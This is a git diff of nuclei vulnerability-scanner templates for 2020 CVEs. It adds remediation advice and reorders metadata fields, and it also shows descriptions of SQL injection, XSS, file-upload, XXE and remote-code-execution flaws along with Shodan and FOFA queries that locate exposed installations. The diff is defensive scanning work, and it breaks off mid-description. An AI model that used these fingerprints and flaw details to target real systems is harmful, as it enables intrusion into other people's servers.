CVE-2020-22209 cwe-id: CWE-89 epss-score: 0.10555 - cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* epss-percentile: 0.94277 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 - fofa-query: app="74cms" - shodan-query: http.html:"74cms" vendor: 74cms product: 74cms + shodan-query: http.html:"74cms" + fofa-query: app="74cms" tags: cve,cve2020,74cms,sqli variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index 2ed80a6fa5..217e04baed 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_officebuilding.php file. reference: - https://github.com/blindkey/cve_like/issues/11 - https://nvd.nist.gov/vuln/detail/CVE-2020-22210 @@ -15,14 +17,14 @@ info: cve-id: CVE-2020-22210 cwe-id: CWE-89 epss-score: 0.10555 - cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* epss-percentile: 0.94277 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 - fofa-query: app="74cms" - shodan-query: http.html:"74cms" vendor: 74cms product: 74cms + shodan-query: http.html:"74cms" + fofa-query: app="74cms" tags: cve,cve2020,74cms,sqli variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index 6cc741bf73..efff98cc7a 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 'key' parameter of ajax_street.php in 74cms. reference: - https://github.com/blindkey/cve_like/issues/13 - https://nvd.nist.gov/vuln/detail/CVE-2020-22211 @@ -15,14 +17,14 @@ info: cve-id: CVE-2020-22211 cwe-id: CWE-89 epss-score: 0.10555 - cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* epss-percentile: 0.94277 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 - fofa-query: app="74cms" - shodan-query: http.html:"74cms" vendor: 74cms product: 74cms + shodan-query: http.html:"74cms" + fofa-query: app="74cms" tags: cve,cve2020,74cms,sqli variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml index 7cf44b81d8..a7f2e41d12 100644 --- a/http/cves/2020/CVE-2020-22840.yaml +++ b/http/cves/2020/CVE-2020-22840.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: b2evolution CMS before 6.11.6 contains an open redirect vulnerability via the redirect_to parameter in email_passthrough.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade b2evolution CMS to version 6.11.6 or later to mitigate the open redirect vulnerability (CVE-2020-22840). reference: - https://github.com/b2evolution/b2evolution/issues/102 - http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-22840 cwe-id: CWE-601 epss-score: 0.01174 - cpe: cpe:2.3:a:b2evolution:b2evolution:*:*:*:*:*:*:*:* epss-percentile: 0.83233 + cpe: cpe:2.3:a:b2evolution:b2evolution:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: b2evolution diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index 919535e15f..11ef657d5d 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: OPNsense through 20.1.5 contains an open redirect vulnerability via the url redirect parameter in the login page, which is not filtered. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade OPNsense to a version higher than 20.1.5 to mitigate the vulnerability. reference: - https://github.com/opnsense/core/issues/4061 - https://nvd.nist.gov/vuln/detail/CVE-2020-23015 @@ -14,8 +16,8 @@ info: cve-id: CVE-2020-23015 cwe-id: CWE-601 epss-score: 0.00228 - cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* epss-percentile: 0.60346 + cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: opnsense diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index 6705d1f51b..4c8e227cbc 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. + remediation: | + To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html - https://nvd.nist.gov/vuln/detail/CVE-2020-23517 @@ -14,15 +16,15 @@ info: cve-id: CVE-2020-23517 cwe-id: CWE-79 epss-score: 0.00118 - cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:* epss-percentile: 0.45089 + cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true - shodan-query: title:"HighMail" - fofa-query: title="HighMail" + max-request: 2 vendor: aryanic product: high_cms + shodan-query: title:"HighMail" + fofa-query: title="HighMail" tags: cve,cve2020,xss,cms,highmail,aryanic http: diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index 4b672bdab4..ae373f2b32 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server. + remediation: | + Apply the latest firmware update provided by Kyocera to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/48561 - https://nvd.nist.gov/vuln/detail/CVE-2020-23575 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-23575 cwe-id: CWE-22 epss-score: 0.01879 - cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.86948 + cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kyocera diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index c9c01bbe18..bde9d3a077 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the page feature in admin/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/monstra-cms/monstra/issues/463 - https://nvd.nist.gov/vuln/detail/CVE-2020-23697 @@ -15,11 +17,11 @@ info: cve-id: CVE-2020-23697 cwe-id: CWE-79 epss-score: 0.0009 - cpe: cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:* epss-percentile: 0.37386 + cpe: cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:* metadata: - max-request: 4 verified: true + max-request: 4 vendor: monstra product: monstra_cms tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated diff --git a/http/cves/2020/CVE-2020-23972.yaml b/http/cves/2020/CVE-2020-23972.yaml index 09416ea52d..e2f48aa54e 100644 --- a/http/cves/2020/CVE-2020-23972.yaml +++ b/http/cves/2020/CVE-2020-23972.yaml @@ -7,6 +7,8 @@ info: description: | Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext. + remediation: | + Apply the latest security patch or update to a patched version of Joomla! Component GMapFP 3.5 to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/49129 - https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md @@ -18,13 +20,13 @@ info: cve-id: CVE-2020-23972 cwe-id: CWE-434 epss-score: 0.59376 - cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:* epss-percentile: 0.9731 + cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:* metadata: max-request: 2 - framework: joomla\! vendor: gmapfp product: gmapfp + framework: joomla\! tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive variables: name: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index 08f2785822..27f69539a8 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: WordPress plugin Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 contains a server-side request forgery (SSRF) vulnerability via the data parameter in a moove_read_xml action. + remediation: | + Update to the latest version of the Import XML & RSS Feeds WordPress Plugin (2.0.2 or higher) to mitigate the vulnerability. reference: - https://github.com/dwisiswant0/CVE-2020-24148 - https://wordpress.org/plugins/import-xml-feed/#developers @@ -16,13 +18,13 @@ info: cve-id: CVE-2020-24148 cwe-id: CWE-918 epss-score: 0.06584 - cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:* epss-percentile: 0.92859 + cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: mooveagency product: import_xml_and_rss_feeds + framework: wordpress tags: cve,cve2020,wordpress,wp-plugin,ssrf http: diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index 70bd6f7df8..995f9d2854 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -5,6 +5,8 @@ info: author: Ganofins severity: critical description: WordPress wpDiscuz plugin versions version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server. + remediation: | + Update the wpDiscuz plugin to the latest version (>=7.0.5) to mitigate this vulnerability. reference: - https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md - https://nvd.nist.gov/vuln/detail/CVE-2020-24186 @@ -16,13 +18,13 @@ info: cve-id: CVE-2020-24186 cwe-id: CWE-434 epss-score: 0.97466 - cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* epss-percentile: 0.99936 + cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: gvectors product: wpdiscuz + framework: wordpress tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive http: diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml index 65b637d45e..6e44d5d758 100644 --- a/http/cves/2020/CVE-2020-24223.yaml +++ b/http/cves/2020/CVE-2020-24223.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters. + remediation: | + Upgrade to the latest version of Mara CMS or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/48777 - https://sourceforge.net/projects/maracms/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-24223 cwe-id: CWE-79 epss-score: 0.00976 - cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:* epss-percentile: 0.81474 + cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mara_cms_project diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index 9817359823..d0cd5918f6 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -6,6 +6,8 @@ info: severity: high description: | mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken. + remediation: | + Update the WordPress Plugin File Manager (wp-file-manager) to the latest version to mitigate the backup disclosure vulnerability. reference: - https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/ - https://nvd.nist.gov/vuln/detail/CVE-2020-24312 @@ -15,13 +17,13 @@ info: cve-id: CVE-2020-24312 cwe-id: CWE-552 epss-score: 0.01899 - cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* epss-percentile: 0.87035 + cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: webdesi9 product: file_manager + framework: wordpress tags: cve,cve2020,wordpress,backups,plugin http: diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index 183cdee90f..b37e74a5aa 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml @@ -5,6 +5,8 @@ info: author: leovalcante severity: critical description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: - https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/ - https://github.com/mongo-express/mongo-express/commit/3a26b079e7821e0e209c3ee0cc2ae15ad467b91a @@ -15,13 +17,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-24391 epss-score: 0.49786 - cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* epss-percentile: 0.9707 + cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* metadata: max-request: 3 - framework: node.js vendor: mongo-express_project product: mongo-express + framework: node.js tags: cve,cve2020,mongo,express,rce,intrusive http: diff --git a/http/cves/2020/CVE-2020-24550.yaml b/http/cves/2020/CVE-2020-24550.yaml index 29a8e4466f..cc63c5916d 100644 --- a/http/cves/2020/CVE-2020-24550.yaml +++ b/http/cves/2020/CVE-2020-24550.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: EpiServer Find before 13.2.7 contains an open redirect vulnerability via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to EpiServer Find version 13.2.7 or later to fix the open redirect vulnerability. reference: - https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/ - https://nvd.nist.gov/vuln/detail/CVE-2020-24550 @@ -14,8 +16,8 @@ info: cve-id: CVE-2020-24550 cwe-id: CWE-601 epss-score: 0.00157 - cpe: cpe:2.3:a:episerver:find:*:*:*:*:*:*:*:* epss-percentile: 0.5154 + cpe: cpe:2.3:a:episerver:find:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: episerver diff --git a/http/cves/2020/CVE-2020-24571.yaml b/http/cves/2020/CVE-2020-24571.yaml index 8d2a76e4e8..5fe89d1bd5 100644 --- a/http/cves/2020/CVE-2020-24571.yaml +++ b/http/cves/2020/CVE-2020-24571.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal and local file inclusion. + remediation: | + Upgrade NexusDB to version 4.50.23 or later to mitigate the LFI vulnerability. reference: - https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 - https://nvd.nist.gov/vuln/detail/CVE-2020-24571 @@ -14,8 +16,8 @@ info: cve-id: CVE-2020-24571 cwe-id: CWE-22 epss-score: 0.02885 - cpe: cpe:2.3:a:nexusdb:nexusdb:*:*:*:*:*:*:*:* epss-percentile: 0.89445 + cpe: cpe:2.3:a:nexusdb:nexusdb:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nexusdb diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml index 1f0c57b928..7e9385f988 100644 --- a/http/cves/2020/CVE-2020-24579.yaml +++ b/http/cves/2020/CVE-2020-24579.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. + remediation: | + Apply the latest firmware update provided by D-Link to fix the vulnerability. reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/ - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-24579 cwe-id: CWE-287 epss-score: 0.00455 - cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.72083 + cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: dlink diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index d2bc49193b..716d2d5624 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml @@ -5,6 +5,8 @@ info: author: lethargynavigator severity: critical description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls. + remediation: | + Upgrade to a patched version of WSO2 API Manager (3.1.1 or above) or apply the provided security patch. reference: - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742 - https://nvd.nist.gov/vuln/detail/CVE-2020-24589 @@ -14,8 +16,8 @@ info: cve-id: CVE-2020-24589 cwe-id: CWE-611 epss-score: 0.57189 - cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* epss-percentile: 0.97253 + cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wso2 diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index c95365d9e5..478c2ec415 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to a patched version of Quixplorer (>=2.4.2) or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt - https://nvd.nist.gov/vuln/detail/CVE-2020-24902 @@ -15,15 +17,15 @@ info: cve-id: CVE-2020-24902 cwe-id: CWE-79 epss-score: 0.00179 - cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:* epss-percentile: 0.54405 + cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:* metadata: - max-request: 1 - google-query: intitle:"My Download Server" - shodan-query: http.title:"My Download Server" verified: true + max-request: 1 vendor: quixplorer_project product: quixplorer + shodan-query: http.title:"My Download Server" + google-query: intitle:"My Download Server" tags: cve,cve2020,quixplorer,xss http: diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index ed1b27ad39..3be41411bd 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to a patched version of Cute Editor for ASP.NET or implement proper input validation to prevent XSS attacks. reference: - https://seclists.org/bugtraq/2016/Mar/104 - https://nvd.nist.gov/vuln/detail/CVE-2020-24903 @@ -15,15 +17,15 @@ info: cve-id: CVE-2020-24903 cwe-id: CWE-79 epss-score: 0.00246 - cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:* epss-percentile: 0.61852 + cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:* metadata: - max-request: 1 - shodan-query: http.component:"ASP.NET" verified: true - framework: asp.net + max-request: 1 vendor: cutesoft product: cute_editor + framework: asp.net + shodan-query: http.component:"ASP.NET" tags: cve,cve2020,cuteeditor,xss,seclists http: diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index 529b1b430c..0a552be458 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: A reflected cross-site scripting vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - https://github.com/qcubed/qcubed/pull/1320/files @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-24912 cwe-id: CWE-79 epss-score: 0.00187 - cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:* epss-percentile: 0.55307 + cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: qcubed diff --git a/http/cves/2020/CVE-2020-24949.yaml b/http/cves/2020/CVE-2020-24949.yaml index 4cf69856ed..5bad9c5f0a 100644 --- a/http/cves/2020/CVE-2020-24949.yaml +++ b/http/cves/2020/CVE-2020-24949.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of PHP-Fusion. reference: - https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt - https://github.com/php-fusion/PHP-Fusion/issues/2312 @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-24949 cwe-id: CWE-77 epss-score: 0.96607 - cpe: cpe:2.3:a:php-fusion:php-fusion:9.03.50:*:*:*:*:*:*:* epss-percentile: 0.99452 + cpe: cpe:2.3:a:php-fusion:php-fusion:9.03.50:*:*:*:*:*:*:* metadata: max-request: 1 vendor: php-fusion diff --git a/http/cves/2020/CVE-2020-25078.yaml b/http/cves/2020/CVE-2020-25078.yaml index dfbfe11ae7..9cc5093afb 100644 --- a/http/cves/2020/CVE-2020-25078.yaml +++ b/http/cves/2020/CVE-2020-25078.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the /config/getuser endpoint allows for remote administrator password disclosure. + remediation: | + Update the camera firmware to the latest version to fix the vulnerability. reference: - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180 - https://twitter.com/Dogonsecurity/status/1273251236167516161 @@ -14,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25078 epss-score: 0.96829 - cpe: cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99549 + cpe: cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index 07cababd07..e7fed98189 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -7,6 +7,8 @@ info: author: foulenzer severity: critical description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files. + remediation: | + Update to the latest version of the WordPress File Manager Plugin to mitigate this vulnerability. reference: - https://plugins.trac.wordpress.org/changeset/2373068 - https://github.com/w4fz5uck5/wp-file-manager-0day @@ -19,13 +21,13 @@ info: cve-id: CVE-2020-25213 cwe-id: CWE-434 epss-score: 0.97341 - cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* epss-percentile: 0.99825 + cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: webdesi9 product: file_manager + framework: wordpress tags: wordpress,rce,kev,fileupload,intrusive,packetstorm,cve,cve2020 http: diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml index 46200c7a10..8323f0fe08 100644 --- a/http/cves/2020/CVE-2020-25223.yaml +++ b/http/cves/2020/CVE-2020-25223.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11. + remediation: | + Apply the latest security patches provided by Sophos to mitigate the vulnerability. reference: - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223 - https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223 @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-25223 cwe-id: CWE-78 epss-score: 0.97519 - cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:* epss-percentile: 0.99975 + cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sophos diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index 115cc72d05..28fd68342d 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Xinuo (formerly SCO) Openserver versions 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section' and is vulnerable to reflected cross-site scripting. + remediation: | + Apply the latest security patches or updates provided by Xinuo to fix the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/49300 - https://github.com/Ramikan/Vulnerabilities/blob/master/SCO%20Openserver%20XSS%20%26%20HTML%20Injection%20vulnerability @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-25495 cwe-id: CWE-79 epss-score: 0.00153 - cpe: cpe:2.3:a:xinuos:openserver:5.0.7:*:*:*:*:*:*:* epss-percentile: 0.50958 + cpe: cpe:2.3:a:xinuos:openserver:5.0.7:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xinuos diff --git a/http/cves/2020/CVE-2020-25506.yaml b/http/cves/2020/CVE-2020-25506.yaml index 253a0f9438..7d40250e23 100644 --- a/http/cves/2020/CVE-2020-25506.yaml +++ b/http/cves/2020/CVE-2020-25506.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. + remediation: | + Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-25506 cwe-id: CWE-78 epss-score: 0.97451 - cpe: cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:* epss-percentile: 0.99921 + cpe: cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:* metadata: max-request: 2 vendor: dlink diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index ecf0a22ece..5ad3b16b17 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Oracle WebLogic Server (Oracle Fusion Middleware (component: WLS Core Components) is susceptible to a remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 2.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability could allow unauthenticated 